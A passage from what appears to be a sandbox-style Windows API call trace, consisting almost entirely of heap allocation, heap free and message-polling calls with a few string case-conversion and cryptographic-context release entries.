lpMsg=0x8bed48) returned 0 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0195.769] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.769] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.769] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.770] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0195.770] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0195.770] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0195.770] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.771] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0195.771] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.771] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0195.771] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0195.771] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.771] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0195.771] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.771] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.772] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.772] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0195.772] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.772] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.772] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.772] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.772] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.772] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0195.773] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.773] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.773] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.773] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.773] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.773] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0195.773] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.774] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0195.774] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.774] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.774] CryptReleaseContext (hProv=0xad6150, dwFlags=0x0) returned 1 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0195.776] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0195.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0195.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0195.777] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0195.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0195.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.777] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0195.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0195.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0195.777] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0195.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0195.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0195.778] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0195.778] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0195.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0195.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0195.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.779] FreeLibrary (hLibModule=0x74d40000) returned 1 [0195.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.779] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0195.779] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 